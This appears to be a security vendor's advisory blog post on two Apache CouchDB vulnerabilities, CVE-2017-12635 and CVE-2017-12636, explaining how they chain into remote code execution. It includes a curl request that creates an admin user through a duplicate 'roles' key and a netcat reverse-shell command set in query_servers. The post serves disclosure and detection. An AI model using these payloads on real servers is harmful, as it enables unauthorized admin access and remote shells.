CouchDB Remote Code Execution Vulnerability

CouchDB is an open source non-SQL database designed for easy data replication. It uses Couch replication protocol to implement its replication functionality. CouchDB is implemented in Erlang. Two vulnerabilities CVE-2017-12635, CVE-2017-12636 were reported in CouchDB, they can exploited by attackers to achieve remote code execution with admin privileges.

CVE-2017-12635: Elevation of privilege
The vulnerability allows non-admin users to assign admin privileges to themselves. The affected versions are Apache CouchDB before 1.7.0 and 2.x before 2.1.1. In CouchDB users are created by inserting a document into _users database. The document includes a list of ‘roles‘ and additional strings representing extra privileges. This request is sent as a serialized JSON object. CouchDB has to two JSON parsers, the native Erlang parser and Javascript JSON parser. The native parser uses Jiffy an open source JSON parser for Erlang.

The issue occurs when the JSON object contains duplicate keys. Javascript parser accepts the last key value pair but the native parser accepts both values and retrieves the first key data for further request processing. So if a user create JSON object contains two different values for the key ‘roles’ it chooses the first entry for setting authorization for the new user.

curl -X PUT 'http://<link or ip>:5984/_users/org.couchdb.user:attacker'
--data-binary '{
  "type": "user",
  "name": "attacker",
  "roles": ["_admin"],
  "roles": [],
  "password": "password"

In the request above there is a duplicate entry for key ‘roles‘. CouchDB will choose the first value “roles”: [“_admin”] and assign admin rights to new user ‘attacker’, the Javascript parser would see only “roles”: [] so validate_doc_update() will not trigger any exception. Users should not be able to grant themselves admin privileges. In conjuction with CVE-2017-12636 and attacker can achieve remote code/command execution.

CVE-2017-12636: Command Injection
CouchDB support modifying configuration variables via HTTP(S). This operation is only accessible to admin users. Many of these settings are paths to executable binaries that executed by CouchDB. One of these config variables is query_servers located in local.ini. An attacker can set one of these variables, and have CouchDB execute said binary under the OS context. This vulnerability can be exploited by creating an admin user by exploiting CVE-2017-12635, and use that account to modify query_server to point to our desired executable.

There is a publicly available PoC that is capable of creating an admin user, modify the query_servers  variable and execute a command. There are reports that these vulnerabilities are exploited by attackers to download and execute cryptocurrency miners for Monero.

We create user ‘dragon1‘ with roles set to _admin. We will use this user to exploit CVE-2017-12636.

Create User with _admin role

Next we modify the query_server to include our own entry. The format for the entries is <LANGUAGE> = <PATH> <ARGS>. So we will add ‘cmd = nc -c /bin/sh 11000’

modifying query_servers

Creating a dummy database vultest3

Create Database

Adding a document vul3 to database

adding document

calling query_servers value to validate said document.

Calling cmd

In the request above we are calling the value by name ‘cmd’, this will execute netcat on the target machine which initiates a connection to the attackers IP address.
Apache CouchDB has addresses these vulnerabilities in version 2.1.1 & 1.7.0/1.7.1. The code has been updated to imitate Javascript JSON parser by picking the last key, if duplicates exist keys exist. The attack vector for  CVE 2017-12636 has been addresses by adding a blacklist for configuration settings which can be modified only via shell access

We requests our customers to scan their network using QID 20056 to detect vulnerable machines. The QID detects vulnerable versions of CouchDB.

Please continue to follow Qualys for more information on these vulnerabilities.

Remote Code Execution in CouchDB:CVE-2017-12635
Apache CouchDB CVE-2017-12635 and CVE-2017-12636
Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

Leave a Reply

Your email address will not be published. Required fields are marked *